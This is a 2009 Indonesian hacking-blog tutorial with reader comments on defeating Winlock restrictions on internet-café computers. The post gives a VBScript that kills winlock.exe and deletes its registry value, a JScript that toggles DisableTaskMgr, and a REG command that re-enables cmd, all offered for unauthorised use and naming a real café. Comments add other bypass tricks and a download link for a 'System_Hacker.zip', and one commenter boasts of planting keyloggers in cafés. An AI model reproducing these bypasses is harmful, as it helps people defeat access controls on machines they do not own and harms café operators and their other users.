Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Winlock Warnet With Script

18 November 2009
Penulis:   · Kategori Artikel: Tutorial

BINUS HACKER Binus Hacker Is Not Criminal Banner





Tutorial Iseng Di Warnet Versi Winlock

Okey, Pasti semua udah tau winlock itu apa kan ?

Kalo blom tau search aja di google yah..

Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut.

Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut.

Contohnya aja Net E*ph*ria / L*ghT*o Net di Jalan Kampus Anggrek-Syahdan.

Dan Masih banyak lagi warnet-warnet yang menggunakan aplikasi ini.

Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. Jiahahahah.

Sebenernya sudah saya tulis di website pribadi / blog saya, Cuma gak ada salahnya kan buat sharing disini ? heheheh..

OK. Yang dibutuhin cuma 1. Notepad / Wordpad.

ikirkan gimana caranya buat buka notepad tersebut. Banyak caranya.

Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..

Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..

OK langsung aj yah, udah dibuka notepad/wordpad ?

Usahakan cek dulu ada deepfreeze atau kagak.

Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.

Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini

strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next


Const HKEY_CLASSES_ROOT = &H80000000

strComputer = “.”

Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.

Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan :

Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?

Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).

Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.

Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.

Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt.

Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.

Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.

Misalkan berada di folder C:\program files\winlockpro

Ketik C: lalu enter Ketik cd program files lalu enter

Ketik cd winlockpro lalu enter

Dan ketik winlock.exe lalu enter

TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.

Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

Best regards.

suicidal

Novrizal Zuhri

BINUS HACKER Binus Hacker Chat and Forum

Komentar

71 Komentar Untuk “Hacking Winlock Warnet With Script
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. suicidal pada 18 November 2009 6:38 am

    Masih bisa sampai sekarang. Huaahuahua..

  2. UtuH pada 30 November 2009 7:22 pm

    Selamat Mencoba All :)
    Huehue.. Si Zuhri Suka Iseng Juga Ternyata..
    Kzkzkz..

  3. BLACK pada 12 December 2009 7:15 pm

    w kaga ngarti…..

  4. rey pada 13 December 2009 6:30 pm

    alah,itu mah pelajaran hacker kelas 2 kalee,,,,,,,,,,,,,,,,,,,,,,,,,gak bermerek blash…..!!!!

  5. dera pada 13 December 2009 9:16 pm

    lok tes menejerx g bza dbka/disabel gmn sam…..????

  6. echo pada 19 December 2009 12:00 pm

    scriptx tu d tulis d mn om….hwahwahwa

  7. dhicky pada 19 December 2009 8:35 pm

    manteb…!
    hey warnet2 kampret[maaf saya kasar] i’ll be back
    udah nafsu banged download2 biar ntu warnet2 pelit bayar bill tambahan
    abis mau download yg 1mb aja buad download trainer game gak dikasih
    makasih atas tutornya

  8. LordAkbar pada 28 December 2009 11:21 pm

    bos,scriptnya di save di notepad kan dua2nya.?
    trus di save as file type vbs ya g ada bos
    adanya
    ansi
    unicode
    unicode big endian
    piye gan?

  9. sandal pada 16 January 2010 2:25 am

    thx ya bos……. :D

  10. Curthy Ali pada 5 February 2010 10:18 am

    HAlo Abang2 Hacker….Salam Kenal Dari Saya….
    Mengenai Yang Diatas Itu.. Aku Blm Terlalu Ngerti Cara Pemakaiannya.. Tlg Mnt Pnjlsnnya Yg Lebih jelas Bang…. Saya MOhon Bang Saya Kan Masi Pemula >>> Jadi Saya Mohon Batuan Dari Abang2 Hacker Semua…………………………….

  11. SAIFULLAH pada 15 February 2010 12:39 am

    knapa zhider g’ bsa di installl?,,,tlong q hacker,,,

  12. Riri_Gimbel pada 16 February 2010 8:50 pm

    KK .
    Ada gak sih cara mempercepat billing warnet .
    Sekali2 OP nya nih yang ngerjain User .
    Jangan sering2 OP yang di kerjain sama User karena billing nya di matiin atau di perlambat .
    Huhuhuhuh

  13. YanZ pada 18 February 2010 6:43 am

    hacker punya YM atau FB? mau konsultasi nih… >____<

  14. warui pada 11 March 2010 8:15 pm

    pantes warnet warnet banyak yg rugi garagara dikerjain…..
    sekali kali dong kasih OP masukan angan user terus yg dikasih masukan…..
    ….salam perdamaian…..

  15. Newbie pada 31 March 2010 3:07 pm

    pake proses explorer aja kaleeee langsung kill winlocknya…. dah langdah dongdot…. uppppsss donwload

  16. Dhil pada 9 April 2010 8:48 pm

    Mantebbbbbbbbb bg……….

  17. wahyudewabrata pada 14 April 2010 6:32 am

    mantap ni…

  18. SpetsnazINdo pada 18 April 2010 9:28 pm

    Klik kanan taskbar dan pilih Properties, kemudian check Show Clock dan tekan tombol
    OK.
    Buka Registri dgn menggunakan Registry tools

    Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
    Klik lagi Edit | New | DWORD Value. Beri nama dengan “NoSetFolders” dan isi Value dengan nilai “0″.
    Klik lagi Edit | New | DWORD Value. Beri nama dengan “NoSetTaskbar” dan isikan dengan
    nilai “0″.
    Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
    Klik lagi Edit | New | DWORD Value. Beri nama dengan “DisableRegistryTools” dan isikan
    dengan nilai “1″.

    catatan:untuk bisa masuk ke tempat registry tool (ketik Regedit pada menu Run).

    cara mudah mematikan Deepris.

  19. pakaw pada 7 May 2010 11:48 am

    gw dah coba ntu script,and kaga ngerti…
    trus
    gw jalanin ada bacaanya line errorr
    code blalalalala
    error
    tp tq ya

  20. preman pada 7 May 2010 7:18 pm

    kagak ngeti blasss

  21. cahyono ronaldo pada 10 May 2010 8:28 am

    yang penting bagi ilmu ya
    :)

  22. jahil Dikit Di Warnet « Wallout's pada 17 May 2010 3:30 pm

    [...] View Original Article Blogged with the Flock Browser Categories: komputer Tag:Internet, komputer Komentar (0) Lacak Balik (0) Tinggalkan komentar Lacak balik [...]

  23. ashakura pada 4 June 2010 10:38 pm

    kk scrip winlock nya ga work tuh, winlock nya msh aja ke kunci

    smpe pusing² ngakalin nya tuh

  24. iLham pada 5 June 2010 7:30 am

    wkwkwkwk
    seru juga

  25. izai pada 3 July 2010 9:22 pm

    bisaaa ituu

    ….!

  26. adhe pada 6 July 2010 12:01 pm

    msal khn klw Task Manager dah d bka,tv d file.x ga da menu run,otomatis Run khn g bsa d bka…..gmna cra.x tuch???

  27. izai pada 7 July 2010 6:56 am

    mantap GAn>>>>>……!

  28. Lance pada 28 July 2010 12:48 am

    percuma

    kalau cmdnya kedisable juga.

    pake smadav yg ada toolnya sebenarnya ga ribet, bisa force open.

    saya salah satu admin juga, dan cara tersebut sudah benar2 basi.

  29. hasan pada 2 August 2010 5:17 pm

    bagus mas…..
    masok iki…..

  30. aries pada 13 August 2010 9:13 am

    saya memang baru dsn!!!!!!!!!
    hy abang” hecker????????
    plisssssssss saya g ngrti dgn smua ni…..
    hehehe
    minta pnjelasannya dunk

  31. emo pada 15 August 2010 5:07 pm

    mantap gann…
    berguna bgt bwt gw yg suka masang keylogger d warnet hehehe

  32. mpc pada 7 October 2010 6:17 am

    warnet gw banyak yg hackerin karena ad forum open dan ngak sempat buat security di buat security forum bahas lagi di hacker lagi gan

  33. buyung rancamana pada 23 October 2010 1:01 pm

    hacker2 bangsat rusak citra bangsa
    memang udh rusak di tambah rusak lagi hancur deh man

  34. gakpunyanama pada 8 November 2010 3:17 am

    om…..
    itu tutor’a jelasin tgg matiin Deepfreeze….
    klo Shadow Defender tau gk cara ubah password’a ????
    klo bisa kasih tau ke email aku ya….
    faith_x666@yahoo.co.id

  35. mr.xxx pada 9 November 2010 9:59 am

    bagi semua hacker boleh lah pake gituan trus klo misalnya client di kasih remot pa ngak jadi malu malu in

  36. mr.xxx pada 9 November 2010 10:01 am

    klo emang tu sukses di otak lo semua ngak mikir apa klo si wrnet sampai gulung tikar gara gara sering diusilin trus karyawannya mau di kemana in

  37. medical coder pada 11 January 2011 2:51 am

    Thanks for some quality points there. I am kind of new to online , so I printed this off to put in my file, any better way to go about keeping track of it then printing?

  38. ipang pada 30 January 2011 12:46 am

    kk saya mau nanya gmana klau menggunakan cyber billing and taskmanager d block ditambah deep freeze bukan ka itu sulit bangaet untuk menbuka exe yang d blok??????????? oleh warnet ya

  39. komentator pada 4 February 2011 1:16 am

    cyber billing + deepfeeze + task manager = ganjel aja F8 terus tekan Shitf+PrintScreen 10 detik … hasil nya taraaaa

  40. rizki pada 5 February 2011 10:34 pm

    kk kenapa saya waku update pointblank kok gak bisa .terus keluar winlock ada file yg korupt

  41. j0sdevil pada 21 February 2011 7:33 pm

    smw kk binus yg ckep n pinter”
    ajarin ak dong maklum ak ank daerah..
    tp ak sk bljr com …..
    n ak juga orang biasa gx ad uang bwt kursus..
    plizz ajarin yg gratisan…
    FB= J0h4N_sMILe@yahoo.com

  42. d1r4 pada 14 April 2011 6:53 pm

    pda riibeeedd…>>>>>>> BACA

    ctrl+alt+del lbh gmpang, tnggal tinggl end program billing yg lg booting.

  43. r4s4.asem pada 1 May 2011 1:29 am

    anda akan menanggung dosa yang diperbuat orang lain……bertobatlah…

  44. tamtam pada 8 May 2011 1:29 am

    udah ga bisa lagi pak .. mohon bimbingannya

  45. Rio pada 26 May 2011 8:15 am

    Aq jg punya Game Centre/online, dan u/ masalah user yg suka mengkill program yg terpasang diclient tanpa permisi :), agan” untuk sementara bisa membatasix dengan cara menjadikan program tersebut menjadi servis windows, jadi tiap kali di kill, maka services akan menjalankan programnya kembali secara otomatis ,
    misalnya jika user mengkill winlock pake cara diatas, maka setelah dikill maka akan dijalankan lagi olwh windows secara otomatis.
    dan jangan lupa untuk mendisable registry, gpedit.msc, services.msc, propertis dan taskmanager (cara membuat servis windows dan mendisable taskmanager dan akses” lainx banyak agan” yg menshare diblogx masing”, search aja digoogle), cara ini saya adaptasi dari program tingkalaku sebua virus,

    Jadi tidak selamanya cara kerja virus itu merugikan, sebagian tingka laku virus bisa kita ambil dan terapkan untuk melindungi kompi kita :) :) :)

  46. Tech pada 9 August 2011 5:37 pm

    hehe,,,mav
    cuma sekedar share ja..
    biar cara yang lebih gampang…
    ane pke process explorer..
    trs lngsng kill ja proses winlok.exe.a
    klo emang bner2 mo matiin fungsi winlok tsb, stlh di matiin prosesnya trs tnggl d unistal ja winlok.a..beres dah…hehe
    tks..mav cm skedar share..

  47. Techskill pada 13 August 2011 1:18 pm

    Klo windows xp kan ga perlu repot lagi klo dah kebuka notepadnya, klo aku gini kan misal kita sudah dapatkan notepadnya, tulis sesuatu dan jangan di save dulu lalu matikan komputernya.

    Tar disitu semua prosesnya mati dan pada akhir proses tuh windows minta izin kita mau dimatikan atau tidak notepadnya, yaudah klik aja cancel (semua proses mati kecuali notepad, dan komponen penting lainnya, klo beruntung si admin lupa ngeset winlocknya, jadi winlock ikutan mati). tapi itu bisa diterapkan ga disetiap warnet loh.

  48. aldo pada 21 August 2011 1:09 am

    woy, dah ga bisa kaka, !! >..<

  49. Wahyu pada 30 October 2011 12:23 pm

    bang nih program masih bisa atau ngga
    ko saiia coba ga bisa yah ??? mohon pencerahannya thx ^_^

  50. Achmad Rifai pada 24 March 2012 7:28 pm

    saya punya script langung bisa disable/enable

    cmd, local user, RUN, tsk manager, regedit,

    cman aku belom uploadin lagi males kapan2 aja ea

    file tersebut aku upload dengan nama file “System_Hacker.zip”
    coba check di url:smadav-bajakan.4shared.com

    jika kamu tidak menemuka di list (1) coba pindah ke daftar no (2)

    atau jika kamu tidak mengerti download disini
    http://www.4shared.com/zip/CHZf7sSB/file.html

    sekian thanks
    By:indousahacker@gmail.com

  51. takim_julak pada 10 April 2012 4:51 am

    klo d tempat gwe,,tetap gwe winlock,,dan cuman segitu syarat yg gwe tawar kan buat nge net warnet gwe,, jdi seumpama ngerasa terbatas dikarenakan ada winlock mending ke net lain aja,, dan mohon tidak nge Hack winlock gwe segala..

  52. nabit pada 28 June 2012 9:19 pm

    Saya ga ngerti.. Sebenarnya tutorial seperti ini untuk menghancurkan orang yang sedang mencari nafkah atau memang ingin merusak mengganggu warnet sekitar kita?

    tutorial hack semacam ini lebih banyak mendapat mudharat dari pada manfaat. Jika anda seorang pengusaha warnet apakah anda senang jika komputer anda di rusak??

  53. suicidal pada 2 July 2012 10:39 am

    Tolong plis jangan komentar yang aneh2.
    Disini saya hanya sekedar sharing pengalaman, jika memang ada yang dirugikan, ya maaf. Ini hanya sebagai bahan pembelajaran biar kedepannya lebih baik lagi.

    Untuk comment yang gampang tinggal download lah ato apalah.
    Disini kasusnya dalam konteks kita tidak dapat melakukan apa pun seperti download. Jadi tolong dipikirkan lagi kalo ada yang bilang cara basi ato apalah itu namanya, pake tools bisa dll. “INGAT INI ADALAH TEKNIK DENGAN HANYA MENGGUNAKAN NOTEPAD”.

    Dan 1 lagi, disini saya melakukan dengan kondisi PC yang sangat super di protect. Dan ini adalah triknya dalam melakukan bypass seperti diatas. Semua disabled mulai dari taskmgr, regedit, gpedit.msc, cmd, dll.

    Maaf jika ada komentar yang belum dibalas, ini trik lama dan hanya sekedar sharing.
    Thanks

  54. andri pada 6 October 2012 7:26 pm

    Gua kaga Ngerti……………

  55. facebook software engineer salary package pada 10 October 2012 4:32 pm

    Hi there, every time i used to check webpage posts here in the early hours in the break of day, for the reason that i like to gain knowledge of
    more and more.

  56. Ibnu pada 12 October 2012 5:22 pm

    Gua kaga ngerti pusing !!

  57. slumberlayan pada 14 October 2012 3:11 am

    Salam dari Malaysia,
    Saya sudah berjaya enable “cmd” dan juga sudah berjaya mencari lokasi winlock.exe.
    Namun, saya masih tidak faham final step bagaimana untuk shutdown/kill winlock.exe setelah ianya di-run di dlm cmd.

    Buat masa ini walaupun task manager dan cmd sudah boleh digunakan, tetapi saya masih belum dapat full-control computer yang sedang saya kerjakan.

    Saya telah mengikuti setiap langkah2 dan script yang anda berikan di atas. Cuma masalah dia final step sahaja.

    TQ
    slumberlayan

  58. hadipendekarcybercreeeeem pada 23 December 2012 7:04 pm

    hahahahaha gua ketawa aja lah

  59. angga pada 27 December 2012 2:21 am

    g bisa bos, karna task managernya juga g bisa di buka, apalagi run

  60. angga pada 27 December 2012 2:23 am

    warnet kyok dancok pelit nian dnload g bisa apa2 g bisa….

  61. heri pada 25 January 2013 4:29 am

    gimana cara mengatsi keamanan yar heker g bobol

  62. Bagi Rejeki pada 8 May 2013 7:42 am

    strComputer = “.”
    Set objWMIService = GetObject(“winmgmts:” _
    & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
    Set colProcessList = objWMIService.ExecQuery _
    (“Select * from Win32_Process Where Name = ‘winlock.exe’”)
    For Each objProcess in colProcessList
    objProcess.Terminate()
    Next

    scrip itu buat matiin winlock.exe

    jadi biar scripnya engga mempan, ganti aja nama winlock.exe dengan nama sembarang, lebih bagus lagi kalau namanya diganti menjadi critical proses nama windows seperti isass.exe, smss.exe, csrss.exe, winlogon.exe, dan lainnya.

    Dijamin scrip diatas engga mempan

  63. diaz pada 25 June 2013 10:59 pm

    gwa gk ngerti mau Cheat Cso Speed hack

  64. hendri pada 30 June 2013 1:48 pm

    Untuk kill winlock pke script no 1 bisa?
    Sebab dsni
    Windows+ctrl+alt+shift+delete tombol nya dinon aktifkan oleh
    Winlock…
    Klik kanan mouse juga…

    Jdi buka command prompt appun tdk bs…

    Cmn computernya tidak ada deepfreeze tkut nnti ada bekas…
    Gimana coba?

  65. Rain pada 1 August 2013 6:52 am

    hemz…pas sampe di cari tau letak winlocknya…kan di lock kk..g bsa di cari tau dmn winlocknya..gmn tu.?

  66. hack free download pada 5 November 2013 9:15 am

    very love this page … You can find out here read a lot of interesting things.

  67. heri pada 20 November 2013 2:57 am

    sekrang masih Aktif gan ?

  68. Anatamus pada 7 January 2014 7:58 am

    om admin,kalau boleh saya ingin gabung aktivis hacker donk.
    saya jurusan rekayasa perangkat lunak,namun ga diajarin soal hack.
    boleh ga ngefollow and gabung aktivis binus dan belajar coding” nya.

  69. roby pada 3 February 2014 8:39 pm

    kok ruet sih gann!!

  70. android wallpapers hd pada 26 February 2014 3:29 pm

    Hi to every single one, it’s in fact a fastidious for me to
    go to see this web site, it includes priceless Information.

  71. roby_pro_dewa pada 17 March 2014 7:48 am

    aduh caranya rumit amet sampai mouse gue rusak aq injak injak gara gara greget

Silahkan Berikan Tanggapan Anda...